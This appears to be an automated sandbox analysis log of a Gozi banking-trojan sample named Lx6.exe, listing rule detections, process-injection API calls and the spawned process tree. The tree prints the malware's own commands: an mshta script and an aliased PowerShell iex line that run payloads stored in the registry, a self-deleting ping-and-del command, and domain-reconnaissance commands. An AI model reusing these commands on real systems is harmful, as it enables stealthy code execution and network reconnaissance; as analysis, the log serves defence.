Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_004015CB GetProcAddress,NtCreateSection,memset, 0_2_004015CB
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0040182B NtMapViewOfSection, 0_2_0040182B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00401673 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_00401673
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_007541C8 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_007541C8
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_0076D196
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0075AA0B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075B433 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_0075B433
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00751402 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_00751402
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00768E68 NtQueryInformationProcess, 0_2_00768E68
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076E897 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_0076E897
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00754153 NtGetContextThread,RtlNtStatusToDosError, 0_2_00754153
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle, 0_2_0076411F
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0077027B NtQueryInformationProcess, 0_2_0077027B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00754A69 memset,NtQueryInformationProcess, 0_2_00754A69
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075624E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0075624E
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0076BB1B OpenProcess,NtQueryInformationProcess, 0_2_0076BB1B
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_007523FC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_007523FC
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00752BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_00752BC2
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_007684EA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_007684EA
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075BDCE OpenProcess,OpenProcess,TerminateProcess,NtSuspendProcess,OpenProcess,CloseHandle,NtResumeProcess,CloseHandle, 0_2_0075BDCE
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_00753F26 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_00753F26
Source: C:\Users\user\Desktop\Lx6.exe Code function: 0_2_0075BF83 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0075BF83
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 35_2_0302AA0B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 35_2_0303D196
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03038E68 NtQueryInformationProcess, 35_2_03038E68
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303BB1B NtQueryInformationProcess, 35_2_0303BB1B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03022BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 35_2_03022BC2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_03024A69 memset,NtQueryInformationProcess, 35_2_03024A69
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0304027B NtQueryInformationProcess, 35_2_0304027B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle, 35_2_0303411F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0303E897 NtQuerySystemInformation,RtlNtStatusToDosError, 35_2_0303E897
Source: C:\Windows\SysWOW64\cmd.exe Code function: 35_2_0302BDCE TerminateProcess,NtSuspendProcess,CloseHandle,NtResumeProcess,CloseHandle, 35_2_0302BDCE
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E73BC NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 41_2_000001CEDB3E73BC
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB40B934 NtWriteVirtualMemory, 41_2_000001CEDB40B934
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E2950 NtQueryInformationToken,NtQueryInformationToken, 41_2_000001CEDB3E2950
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB4088C8 NtSetContextThread,NtUnmapViewOfSection, 41_2_000001CEDB4088C8
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3E5F64 NtQueryInformationProcess, 41_2_000001CEDB3E5F64
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB4057D8 NtCreateSection, 41_2_000001CEDB4057D8
Source: C:\Windows\System32\cmd.exe Code function: 41_2_000001CEDB3F94A8 NtMapViewOfSection, 41_2_000001CEDB3F94A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA9A10 NtReadVirtualMemory, 62_2_0000019933FA9A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F92950 NtQueryInformationToken,NtQueryInformationToken,NtClose, 62_2_0000019933F92950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FBB934 NtWriteVirtualMemory, 62_2_0000019933FBB934
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB88C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, 62_2_0000019933FB88C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FB57D8 NtCreateSection, 62_2_0000019933FB57D8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F95F64 NtQueryInformationProcess, 62_2_0000019933F95F64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F9F4FC NtAllocateVirtualMemory, 62_2_0000019933F9F4FC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FA94A8 NtMapViewOfSection, 62_2_0000019933FA94A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933F973BC RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor, 62_2_0000019933F973BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Code function: 62_2_0000019933FCD002 NtProtectVirtualMemory,NtProtectVirtualMemory, 62_2_0000019933FCD002
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F5F64 NtQueryInformationProcess, 67_2_000001FA9D6F5F64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D6F2950 NtQueryInformationToken,NtQueryInformationToken,NtClose, 67_2_000001FA9D6F2950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Code function: 67_2_000001FA9D72D002 NtProtectVirtualMemory,NtProtectVirtualMemory, 67_2_000001FA9D72D002
Source: Lx6.exe, 00000000.00000003.448794487.0000000004094000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Lx6.exe
Source: Lx6.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: 9AF9.bin1.20.dr Binary string: Boot Device: \Device\HarddiskVolume2
Source: classification engine Classification label: mal100.spre.bank.troj.spyw.expl.evad.winEXE@132/40@6/4
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: Lx6.exe ReversingLabs: Detection: 66%
Source: Lx6.exe Virustotal: Detection: 63%
Source: C:\Users\user\Desktop\Lx6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\Lx6.exe C:\Users\user\Desktop\Lx6.exe
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Users\user\Desktop\Lx6.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain |more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\more.com more
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
